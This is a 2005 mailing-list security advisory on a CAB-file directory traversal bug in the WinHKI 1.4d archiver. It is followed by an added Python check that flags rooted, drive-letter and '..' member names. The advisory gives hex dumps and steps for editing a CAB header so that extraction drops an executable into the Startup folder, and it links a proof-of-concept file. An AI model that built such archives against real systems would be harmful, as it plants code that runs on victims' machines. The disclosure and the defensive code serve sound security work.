[VulnWatch] WinHKI - CAB File Directory Transversal

From: Rafel Ivgi, The-Insider (theinsider_at_012.net.il)
Date: 01/06/05

    Date: Thu, 06 Jan 2005 10:20:27 +0200
    To: bugtraq@securityfocus.com, full-disclosure@lists.netsys.com, Windows NTBugtraq Mailing List <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>, vulnwatch@vulnwatch.org, news@securiteam.com, "securitytracker.com" <bugs@securitytracker.com>
    
    

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    Application: WinHKI
    Vendors: http://www.webtoolmaster.com
    Versions: 1.4d
    Platforms: Windows
    Bug: CAB File Directory Transversal
    Exploitation: Local (extract file)
    Date: 24 Dec 2004
    Author: Rafel Ivgi, The-Insider
    E-Mail: the_insider@mail.com
    Website: http://theinsider.deep-ice.com

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    1) Introduction
    2) Bugs
    3) The Code

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===============
    1) Introduction
    ===============

    WinHKI is a file archiver that supports the BH, CAB, HKI, JAR, LHA, TAR
    and GZ compression formats.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ======
    2) Bug
    ======

    This is a normal CAB compressed file header:

    00000000 4D53 4346 0000 0000 0E30 0F00 0000 0000 MSCF.....0......
    00000010 2C00 0000 0000 0000 0301 0100 0100 0000 ,...............
    00000020 0000 0000 5800 0000 2000 0100 C8EE 0F00 ....X... .......
    00000030 0000 0000 0000 0C2F CC61 2000 7356 5656 ......./.a .sVVV
    00000040 5656 5656 5656 5656 5656 5656 5656 5656 VVVVVVVVVVVVVVVV
    00000050 5670 352E 6578 6500 5D5B 7CBC 2742 0080 Vp5.exe.][|.'B..
    00000060 434B EC5A 7F54 5457 7E7F 33CC C000 036F CK.Z.TTW~.3....o

    In the following header, we can see how easy it is to change the path
    to anywhere we want, including the All Users Startup folder:

    00000000 4D53 4346 0000 0000 0E30 0F00 0000 0000 MSCF.....0......
    00000010 2C00 0000 0000 0000 0301 0100 0100 0000 ,...............
    00000020 0000 0000 5800 0000 2000 0100 C8EE 0F00 ....X... .......
    00000030 0000 0000 0000 0C2F CC61 2000 433A 5C56 ......./.a .C:\V
    00000040 5656 5656 5656 5656 5656 5656 5656 5656 VVVVVVVVVVVVVVVV
    00000050 5670 352E 6578 6500 5D5B 7CBC 2742 0080 Vp5.exe.][|.'B..
    00000060 434B EC5A 7F54 5457 7E7F 33CC C000 036F CK.Z.TTW~.3....o

    All we need to do is CAB-compress (using Microsoft's "makecab" or WinAce)
    a file with a long name/path and then change the path specified inside
    the file to whatever we want using any hex editor, such as HexWorkshop;
    just add anything to the filename.

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ===========
    3) The Code
    ===========

    An online proof of concept can be found at:
    http://theinsider.web1000.com/hki transversal.cab

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    ---
    Rafel Ivgi, The-Insider
    http://theinsider.deep-ice.com
    "Scripts and Codes will make me D.O.S , but they will never HACK me."
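
The check an extractor needs before writing any CAB member to disk, as an added example that is not part of the original advisory or of WinHKI: read each CFFILE name from the cabinet header and reject names that are rooted, carry a drive letter, or contain "..". The function names are hypothetical, and the sample input is constructed from the header bytes of the two dumps above (compressed data omitted).

```python
import struct

# First 0x3C bytes of the dumps in the advisory: CFHEADER, one CFFOLDER and the
# fixed part of the single CFFILE entry (identical in both dumps).
PREFIX = bytes.fromhex(
    "4D534346 00000000 0E300F00 00000000 2C000000 00000000 03010100 01000000"
    "00000000 58000000 20000100 C8EE0F00 00000000 00000C2F CC612000"
)
# Constructed samples: header prefix plus the NUL-terminated name from each dump.
NORMAL = PREFIX + b"s" + b"V" * 20 + b"p5.exe\x00"
MODIFIED = PREFIX + b"C:\\" + b"V" * 18 + b"p5.exe\x00"


def cab_file_names(cab: bytes) -> list[str]:
    """Return szName of every CFFILE entry listed in the cabinet header."""
    if cab[:4] != b"MSCF":
        raise ValueError("not a cabinet file")
    (coff_files,) = struct.unpack_from("<I", cab, 16)  # offset of first CFFILE
    (c_files,) = struct.unpack_from("<H", cab, 28)     # number of CFFILE entries
    names, pos = [], coff_files
    for _ in range(c_files):
        pos += 16  # skip cbFile, uoffFolderStart, iFolder, date, time, attribs
        end = cab.index(b"\x00", pos)  # szName is NUL-terminated
        # Simplification: names decoded as Latin-1, UTF-8 name flag ignored.
        names.append(cab[pos:end].decode("latin-1"))
        pos = end + 1
    return names


def is_unsafe_name(name: str) -> bool:
    """True if the stored name could escape the chosen extraction directory."""
    parts = name.replace("/", "\\").split("\\")
    return (
        name[:1] in ("\\", "/")   # rooted or UNC path
        or name[1:2] == ":"       # drive letter, e.g. C:\
        or ".." in parts          # parent-directory component
    )


def unsafe_members(cab: bytes) -> list[str]:
    """Names in the cabinet that an extractor should refuse to write."""
    return [n for n in cab_file_names(cab) if is_unsafe_name(n)]
```
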
    
